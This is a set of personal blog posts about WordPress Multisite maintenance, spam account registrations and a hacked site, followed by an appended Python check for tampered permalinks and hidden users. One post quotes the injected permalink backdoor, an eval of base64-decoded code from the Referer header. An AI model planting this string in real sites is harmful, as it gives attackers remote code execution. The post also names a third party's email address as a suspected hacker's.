ERIC SHEFFERMAN <DOT> COM

Blog-o-Goodness

The Miracle of WordPress 3.0 Multisites

WordPress 3.0 Multisites is the indirect solution to so many security and maintenance problems.

I love the ability to rapidly create a beautiful website by installing WordPress and adding a theme. Create a few pages and WordPress handles all the navigation links. Want a contact page? Just add a plugin and you’ve got a contact form with CAPTCHA or whatever other protection you want.

However, creating a WordPress site — even a static one — requires regular maintenance: logging in and running upgrades to WordPress and to the plugins. If you don’t, eventually you’ll be bitten by some security hole. And when that happens — ick!

So what happens is:

You have one blog running WordPress. You log in regularly and maintain it. OK.

You add another site. Pretty! And another. And suddenly you’ve got THREE sites to log into and maintain.

And you build a quick blog site for a friend who doesn’t know computers. And a static site on a topic you have a few things you want to write about. And suddenly running maintenance and plugin upgrades becomes a full-time job.

And you want to do a few extra security upgrades? Lock down the login page or make it stop giving out hints? Or any other brilliant touch for extra security? Suddenly, you have to do it FOR EVERY site you have running WordPress (especially those sites that are static which you would otherwise not have even looked at for another few months or years).

But now… WordPress 3.0 with MultiSites (Multi-sites? Multi sites? I have to check the spelling) TADA!

You can have ONE WordPress install that you maintain and upgrade and do all the wonderful security tricks you want and use that ONE install to run ALL your sites. Suddenly maintenance drops to JUST ONE central WordPress install to maintain. Having 50 domains on a variety of topics is a breeze!

Ah… but to get it to work. That I haven’t figured out yet. But I’m working on it.


Who is UlricheDmond ulrichedmondsuses@gmail.com ?

UlricheDmond using the email address ulrichedmondsuses@gmail.com just created an account on this blog.

Since (as the domain name might suggest) this is my blog (Eric Shefferman), there’s no need for anyone else to have an account here.

I googled the name and so far found

http://savelblogs.com/?p=1566

which lists this name/email as someone who tried to hack their blog (along with a list of other hacker usernames).

They seem to be a busy person/hacker/software robot – they also signed up here on September 7, 2009

http://bbshowcase.org/forums/profile/ulrichedmond

and here on September 8, 2009:

http://www.nudjit.com/community/profile/ulrichedmond

And probably other places that just haven’t been indexed by Google yet.

I deleted the user, but this is getting crazy. Static HTML websites are looking better and better.

- – -

Yup, an hour after I posted this, the same user/email registered on another blog of mine that is totally unrelated. This is pretty stupid since the only reason this is happening is as part of a WordPress security exploit. Someone thinks that by getting a user onto WordPress they can then elevate the user to admin level access and screw around. It’s not like I can stay up all night to try to delete these users as fast as some automated system can add them.


WordPress Security Exploits – This site was hacked

I still have no idea what this means.

I’m currently running WordPress 2.8.4 on this site.

One of my older sites was hacked as per

http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/

and the permalinks were changed to

/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

There was a hidden user named “WordPress” — JavaScript was being used to prevent the user from showing in the admin users section (and it didn’t show the user in the user count). My computer is running slow, so when looking at the user list this second user would appear and then disappear as the JavaScript executed. On a faster computer, it would have been impossible to see the hidden user. Dumbass JavaScript tricks.
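
A check for the two signs described above, as an added example (not code from this blog or from WordPress): it audits a `permalink_structure` value against the structure tags WordPress documents, and compares logins read straight from the `wp_users` table, where admin-page JavaScript cannot hide a row, against the accounts the owner expects. The function names and the sample login list are assumptions made for the example.

```python
import re

# Structure tags WordPress documents for permalink settings.
ALLOWED_TAGS = {"year", "monthnum", "day", "hour", "minute", "second",
                "post_id", "postname", "category", "author"}
TAG_RE = re.compile(r"%([a-z_]+)%")
# Characters a legitimate structure needs between its tags.
LITERAL_RE = re.compile(r"^[A-Za-z0-9/_.-]*$")
# PHP fragments that never belong in a permalink structure.
CODE_MARKERS = ("eval(", "base64_decode", "${", "$_SERVER")

# The altered value quoted in the post above.
ALTERED = ("/%year%/%monthnum%/%day%/%postname%/"
           "%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/")


def audit_permalink(structure):
    """Return a list of findings; an empty list means the value looks clean."""
    findings = []
    for tag in TAG_RE.findall(structure):
        if tag not in ALLOWED_TAGS:
            findings.append("unknown tag: %" + tag + "%")
    leftover = TAG_RE.sub("", structure)
    if not LITERAL_RE.match(leftover):
        findings.append("unexpected characters outside tags")
    for marker in CODE_MARKERS:
        if marker in structure:
            findings.append("code marker: " + marker)
    return findings


def unexpected_users(db_logins, expected_logins):
    """Logins in wp_users (read from the database, not the admin page)
    that are not on the owner's list of known accounts."""
    expected = {name.lower() for name in expected_logins}
    return sorted(name for name in db_logins if name.lower() not in expected)


if __name__ == "__main__":
    for value in ("/%year%/%monthnum%/%day%/%postname%/", ALTERED):
        print(value, "->", audit_permalink(value) or "clean")
    # Constructed sample: "admin" stands in for the owner's real login.
    print(unexpected_users(["admin", "WordPress"], ["admin"]))
```

Feed it the `permalink_structure` row from the options table and the `user_login` column from the users table, taken from a database query or dump.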
